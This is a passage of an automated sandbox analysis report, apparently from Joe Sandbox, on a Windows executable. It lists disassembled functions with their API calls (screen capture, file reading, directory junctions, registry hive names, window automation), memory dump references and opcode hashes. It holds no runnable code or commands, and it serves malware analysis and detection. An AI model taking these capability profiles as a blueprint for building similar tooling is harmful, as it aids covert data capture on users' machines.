                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2347767575-0
                                                                                                                                                          • Opcode ID: a9215484e26267636e87e0ba69f08a889fe749a1c147de6fbcfc64507447a5ae
                                                                                                                                                          • Instruction ID: 47fe04b7c8b732d03572bbe7f1b0b3079a6d9cd677e8335ac549f4520ee29a3f
                                                                                                                                                          • Opcode Fuzzy Hash: a9215484e26267636e87e0ba69f08a889fe749a1c147de6fbcfc64507447a5ae
                                                                                                                                                          • Instruction Fuzzy Hash: A9514B75900209EBDF009FA4DD85EEEBB79FF49305F048159FD26AA690DB309A49CB60
                                                                                                                                                          Function 0017A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetDC.USER32(00000000), ref: 0017A2DD
                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0017A2E9
                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 0017A2F5
                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0017A302
                                                                                                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0017A356
                                                                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0017A392
                                                                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0017A3B6
                                                                                                                                                          • SelectObject.GDI32(00000006,?), ref: 0017A3BE
                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0017A3C7
                                                                                                                                                          • DeleteDC.GDI32(00000006), ref: 0017A3CE
                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 0017A3D9
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                          • String ID: (
                                                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                                                          • Opcode ID: 02a8e15ce2b5c117862dcac353b60df193c1b99c697d50d2445a01de791c0305
                                                                                                                                                          • Instruction ID: 22fe6c50cc70fd2636f212e2229dbfcae42d49321f080a58495ff4a50ab61b03
                                                                                                                                                          • Opcode Fuzzy Hash: 02a8e15ce2b5c117862dcac353b60df193c1b99c697d50d2445a01de791c0305
                                                                                                                                                          • Instruction Fuzzy Hash: A2513676A00709EFCB15CFA8DC84AAEBBB9FF49710F14841DF99AA7650C731A941CB50
                                                                                                                                                          Function 0018E541 Relevance: 21.1, APIs: 14, Instructions: 129commemoryfileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E57B
                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E586
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E593
                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0018E59C
                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E5AB
                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0018E5B4
                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0018BD04,?,?,00000000,?), ref: 0018E5BB
                                                                                                                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0018E5CC
                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,001AD9BC,?), ref: 0018E5E5
                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0018E5F5
                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0018E619
                                                                                                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0018E644
                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0018E66C
                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0018E682
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Global$CloseFileHandleObject$AllocCopyCreateDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1759995340-0
                                                                                                                                                          • Opcode ID: 79a28739c723257cbd37b612e06b151ec9e95b226e095995f96e430e09215edb
                                                                                                                                                          • Instruction ID: dc8cf6bfcadf493c65a15b5fb4c07e8584c275ad0e88a766e315bac23d4252f1
                                                                                                                                                          • Opcode Fuzzy Hash: 79a28739c723257cbd37b612e06b151ec9e95b226e095995f96e430e09215edb
                                                                                                                                                          • Instruction Fuzzy Hash: DE415A75600604BFDB11AF64EC88EABBBB9EF8A715F108059F906D7660D7309E41DF20
                                                                                                                                                          Function 0016D950 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 100COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0016D96C
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016D98E
                                                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0016D9CB
                                                                                                                                                          • _memset.LIBCMT ref: 0016DA0F
                                                                                                                                                          • _wcsncpy.LIBCMT ref: 0016DA4B
                                                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0016DA80
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0016DA8B
                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 0016DA94
                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0016DA9E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseDirectoryHandle$ControlCreateDeviceFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                                                          • API String ID: 1122224643-3457252023
                                                                                                                                                          • Opcode ID: a73a0b4ec1330b19479930eddb53626963d215736faae6241ba16c5a4aaf214b
                                                                                                                                                          • Instruction ID: 3d14d1a92825e4f1c46c82d048997ee085aa8ca7e9db2fe8ad917ee18158ffb0
                                                                                                                                                          • Opcode Fuzzy Hash: a73a0b4ec1330b19479930eddb53626963d215736faae6241ba16c5a4aaf214b
                                                                                                                                                          • Instruction Fuzzy Hash: FD31A976A00208ABDB20DFA4EC49FDA77BDFF89710F1481A6F515D6060E770DA91CBA1
                                                                                                                                                          Function 00170B20 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 229COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 00170C93
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170CAB
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170CBD
                                                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00170CD2
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00170CE6
                                                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00170CFE
                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00170D2A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentDirectory$_wcscat$AttributesFile__wsplitpath
                                                                                                                                                          • String ID: *.*
                                                                                                                                                          • API String ID: 4196653570-438819550
                                                                                                                                                          • Opcode ID: 321954e6fe9fe892c28391710f213672006bc162e68fb5b34b2becd85f7d2b9f
                                                                                                                                                          • Instruction ID: 5dfbc792d3cc599387adb8cec45f67f1fd5d982eeff5fb316687c88fc17cc749
                                                                                                                                                          • Opcode Fuzzy Hash: 321954e6fe9fe892c28391710f213672006bc162e68fb5b34b2becd85f7d2b9f
                                                                                                                                                          • Instruction Fuzzy Hash: 128182B1504305DFC726DF64C844AAAB7F8AB9D314F14C96AF889C7251E730EE85CB92
                                                                                                                                                          Function 0016D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF), ref: 0016D567
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0016D589
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016D5DC
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016D68D
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016D6AB
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                          • API String ID: 2116804098-2391861430
                                                                                                                                                          • Opcode ID: 8be082e5b21348aae9b3e2855b39d50efeac1a64b6720382144736e95f40f61b
                                                                                                                                                          • Instruction ID: 57062e9bbddbf3e789efef82eea4ea5eb5ddceae5c9ddff7a346f05c32a7b6ab
                                                                                                                                                          • Opcode Fuzzy Hash: 8be082e5b21348aae9b3e2855b39d50efeac1a64b6720382144736e95f40f61b
                                                                                                                                                          • Instruction Fuzzy Hash: EF517571D00119BACF15EBA0ED82EEEB779AF24304F104166F115B21A1EB715FA8DB61
                                                                                                                                                          Function 0016D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0016D37F
                                                                                                                                                            • Part of subcall function 0012CAEE: _memmove.LIBCMT ref: 0012CB2F
                                                                                                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0016D3A0
                                                                                                                                                          • __swprintf.LIBCMT ref: 0016D3F3
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016D499
                                                                                                                                                          • _wprintf.LIBCMT ref: 0016D4B7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                          • API String ID: 2116804098-3420473620
                                                                                                                                                          • Opcode ID: 25cb5ef2e9294afa26e90ec550acadba849c8380a935568a3bb1f2f2cabc5256
                                                                                                                                                          • Instruction ID: d8912880432e1b0a71017758e153b92dcd505f4c3d4bb85cac719ca27e218e41
                                                                                                                                                          • Opcode Fuzzy Hash: 25cb5ef2e9294afa26e90ec550acadba849c8380a935568a3bb1f2f2cabc5256
                                                                                                                                                          • Instruction Fuzzy Hash: 2351A771D00119BACB15FBE0ED82EEEB779AF24700F104066F115B21A1EB756FA8CB61
                                                                                                                                                          Function 00183AF7 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 109COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00182AA6,?,?), ref: 00183B0E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharUpper
                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                          • API String ID: 3964851224-909552448
                                                                                                                                                          • Opcode ID: 2629ddb6af216d5c65f9f836a0d942cd5b570b2d14458bcac3cf433fc289c514
                                                                                                                                                          • Instruction ID: a6240aebed332869b19340843db8b9b621faad4506458e9e42e83523a9153b9e
                                                                                                                                                          • Opcode Fuzzy Hash: 2629ddb6af216d5c65f9f836a0d942cd5b570b2d14458bcac3cf433fc289c514
                                                                                                                                                          • Instruction Fuzzy Hash: 51419F3410024A8BDF08FF14E981AEA3765BF25750F18486AFCA26B295DB70DF1ACF50
                                                                                                                                                          Function 001683D6 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00127E53: _memmove.LIBCMT ref: 00127EB9
                                                                                                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0016843F
                                                                                                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00168455
                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00168466
                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00168478
                                                                                                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00168489
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: SendString$_memmove
                                                                                                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                          • API String ID: 2279737902-1007645807
                                                                                                                                                          • Opcode ID: 5245b5ea7176d9018a82ff3adb163c7073230deecfedc4cf1f676783222a04b2
                                                                                                                                                          • Instruction ID: 615beb7e577e552d718f5177407e91e502461bf54c745f39d5de9c2b3d6f77c1
                                                                                                                                                          • Opcode Fuzzy Hash: 5245b5ea7176d9018a82ff3adb163c7073230deecfedc4cf1f676783222a04b2
                                                                                                                                                          • Instruction Fuzzy Hash: 7C11E7B1A5016D79D710A7A1EC4AEFF7B7CEBA1B04F00052AB421A21D1EFA04E54C5B1
                                                                                                                                                          Function 00168097 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • timeGetTime.WINMM ref: 0016809C
                                                                                                                                                            • Part of subcall function 0013E3A5: timeGetTime.WINMM(?,75A4B400,00196163), ref: 0013E3A9
                                                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 001680C8
                                                                                                                                                          • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 001680EC
                                                                                                                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 0016810E
                                                                                                                                                          • SetActiveWindow.USER32 ref: 0016812D
                                                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0016813B
                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 0016815A
                                                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00168165
                                                                                                                                                          • IsWindow.USER32 ref: 00168171
                                                                                                                                                          • EndDialog.USER32(00000000), ref: 00168182
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
